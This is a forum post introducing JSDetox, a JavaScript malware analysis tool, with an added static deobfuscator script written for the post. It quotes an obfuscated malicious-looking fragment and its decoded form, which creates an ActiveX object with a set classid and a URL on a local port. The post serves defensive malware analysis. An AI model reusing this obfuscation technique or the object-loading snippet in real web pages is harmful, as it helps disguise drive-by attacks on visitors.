JSDetox - A javascript malware analysis tool

Open-source projects · posted by guokai 6 years ago · last reply from qq2850071112 4 years ago

A JavaScript malware analysis tool that uses static analysis and deobfuscation techniques, plus an execution engine featuring HTML DOM emulation.

For example, given this obfuscated original code:

var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);

JSDetox's analysis result:

var GPSweCkB = document.createElement("object");
GPSweCkB.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
GPSweCkB.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";

I had originally planned to install it to analyse the ad code that a certain network operator has been injecting into pages, which I captured over the last few days, but the dependency The Ruby Racer 0.9.8 failed to install on my Mac (Lion).

Project page: JSDetox
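The sample above is folded by two purely static rewrites: concatenating the string constants bound inside each immediately-invoked function, and evaluating String.fromCharCode over numeric literals written in a mix of decimal, legacy octal (leading zero) and hexadecimal. The following is an added illustration of those two passes, written for this post; it is not JSDetox's own code and makes no claim about how JSDetox is implemented. It never executes the sample, only rewrites constant sub-expressions, and it handles exactly the patterns shown (single-quoted or nested declarations, escapes inside strings, and semicolons inside string values are assumptions it does not cover).

```javascript
// Added example: a minimal static simplifier for the two obfuscation
// patterns in the post. Not part of JSDetox. Input is the post's sample.

// Interpret a numeric literal as a JS engine would: 0x.. is hex, a
// leading zero followed only by octal digits is legacy octal, else decimal.
function parseJsNumber(tok) {
  tok = tok.trim();
  if (/^0[xX][0-9a-fA-F]+$/.test(tok)) return parseInt(tok, 16);
  if (/^0[0-7]+$/.test(tok)) return parseInt(tok, 8);
  return parseInt(tok, 10);
}

// Pass 1: String.fromCharCode(<numeric literals>)  ->  "literal string"
function foldFromCharCode(src) {
  return src.replace(/String\.fromCharCode\(\s*([0-9a-fA-FxX,\s]+)\)/g, (whole, args) => {
    const codes = args.split(',').map(parseJsNumber);
    if (codes.some(Number.isNaN)) return whole; // leave anything we cannot fold
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Pass 2: (function () { var a="x", b="y"; return b+a })()  ->  "yx"
// Binds each declared string constant, then concatenates in return order.
function foldConcatIife(src) {
  const iife = /\(function\s*\(\)\s*\{\s*var\s+([^;]+);\s*return\s+([\w+\s]+?)\s*\}\)\s*\(\)/g;
  return src.replace(iife, (whole, decls, ret) => {
    const env = new Map();
    const declRe = /(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"/g; // name="string"
    let d;
    while ((d = declRe.exec(decls)) !== null) {
      env.set(d[1], JSON.parse('"' + d[2] + '"'));
    }
    const parts = ret.split('+').map((p) => p.trim());
    if (!parts.every((p) => env.has(p))) return whole; // unknown name: keep as is
    return JSON.stringify(parts.map((p) => env.get(p)).join(''));
  });
}

// Run the passes in order; fromCharCode first so its output can never be
// mistaken for an identifier by the concatenation pass.
function deobfuscate(src) {
  return foldConcatIife(foldFromCharCode(src));
}

// The three lines from the post, verbatim.
const SAMPLE = [
  'var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());',
  'GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());',
  'GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);',
].join('\n');

console.log(deobfuscate(SAMPLE));
```

Running it prints the same three lines JSDetox produced above, which is the useful check when comparing a tool's output against a hand-written pass: the ActiveX classid and the URL are recovered without ever evaluating the script in a browser, so the sample cannot reach the network or the DOM during analysis.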
